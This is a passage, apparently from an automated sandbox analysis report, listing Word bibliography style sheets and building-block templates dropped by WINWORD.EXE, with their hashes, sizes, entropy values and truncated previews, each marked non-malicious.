                                                                                                                                                Entropy (8bit):4.654450340871081
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):296658
                                                                                                                                                Entropy (8bit):5.000002997029767
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268317
                                                                                                                                                Entropy (8bit):5.05419861997223
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):255948
                                                                                                                                                Entropy (8bit):5.103631650117028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):251032
                                                                                                                                                Entropy (8bit):5.102652100491927
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):284415
                                                                                                                                                Entropy (8bit):5.00549404077789
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):294178
                                                                                                                                                Entropy (8bit):4.977758311135714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270198
                                                                                                                                                Entropy (8bit):5.073814698282113
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):217137
                                                                                                                                                Entropy (8bit):5.068335381017074
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254875
                                                                                                                                                Entropy (8bit):5.003842588822783
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):344303
                                                                                                                                                Entropy (8bit):5.023195898304535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):250983
                                                                                                                                                Entropy (8bit):5.057714239438731
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):51826
                                                                                                                                                Entropy (8bit):5.541375256745271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47296
                                                                                                                                                Entropy (8bit):6.42327948041841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34415
                                                                                                                                                Entropy (8bit):7.352974342178997
